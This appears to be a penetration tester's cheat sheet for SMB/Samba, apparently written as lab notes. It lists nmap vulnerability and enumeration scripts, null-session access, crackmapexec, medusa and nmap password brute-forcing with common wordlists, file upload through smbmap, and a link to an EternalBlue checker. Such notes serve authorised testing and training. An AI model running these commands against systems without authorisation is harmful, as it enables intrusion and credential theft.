SMB-Samba 135-139 445

#NMAP

#run this first: reports whether SMB signing is enabled/required on each host
nmap --script=smb2-security-mode.nse -p 445 192.168.10.0/24

sudo nmap -v -p 139,445 -oG smb.txt 10.11.1.8
sudo nmap --script nbstat.nse 10.11.1.5
sudo nmap --script smb-os-discovery 10.11.1.5
sudo nmap -v -p 139,445 --script=smb-os-discovery 10.11.1.5 (variation; no space after the comma, or nmap treats 445 as a target)
nmap --script smb-enum-shares -p139,445 10.11.1.5
sudo nmap --script 'smb-vuln*' 10.11.1.5 #quote the glob so the shell does not expand it
sudo nmap -v -p 139,445 --script='smb-vuln*' --script-args=unsafe=1 10.11.1.5 (variation; unsafe=1 enables checks that can crash the target service)
sudo nmap -A -p 135 --open 10.11.1.0/24 -oG nmap135
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p 445 10.11.1.0/24 #if user/pass are known
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10 #one liner

#Metasploit
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_lookupsid

#Banner grab
nc -nv 10.11.1.5 135

#Crackmapexec

crackmapexec smb --help (smb specific)
crackmapexec smb 10.11.1.128
crackmapexec smb 10.11.1.128 -u 'username' -p 'password'
crackmapexec smb 10.11.1.128 -u "DJ" -p /usr/share/dirb/wordlists/mutations_common.txt
crackmapexec smb 10.11.1.136 -u root -p /usr/share/wordlists/rockyou.txt
crackmapexec smb 10.11.1.146 -u 'guest' -p '' #null session
crackmapexec smb 10.11.1.146 -u '' -p '' --shares #listing available shares

#rpcclient
rpcclient -U "" -N 10.11.1.5

#Ridenum
ridenum.py 10.10.10.10 500 50000 dict.txt #dictionary bruteforce of users

#Null session
Windows: net use \\10.10.10.10\ "" /u:""
Linux: smbclient -L //10.10.10.10

#nmblookup
nmblookup -A 10.11.1.5

#nbtscan
nbtscan 10.11.1.5

#Smbmap
smbmap -H 10.11.1.5 -P 135
Login with creds: smbmap -u "root" -p "123456" -R Bob -H 10.11.1.136 -P 445
smbclient -L 10.11.1.5
smbclient //10.11.1.5/guest
smbclient --no-pass -L //10.11.1.146 #null session

smbmap -H //10.10.10.10/ --upload test.txt /SHARENAME/test.txt #upload file

#Bruteforcing

medusa -h 10.11.1.111 -u redcliff -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt 
nmap -p445 --script smb-brute --script-args userdb=user.txt,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111  -vvvv
nmap --script smb-brute 10.11.1.111

#smbget
smbget -rR smb://192.168.101.83/sambashare -U guest

#Eternalchecker.py
https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternal_checker.py
clone the repo and run it against the target; PoC for the EternalBlue vulnerability

#Mounting shares
Creating a temporary share folder in /tmp (kali): sudo mkdir /tmp/share
Mounting the share: sudo mount -t cifs //10.11.1.146/SusieShare /tmp/share
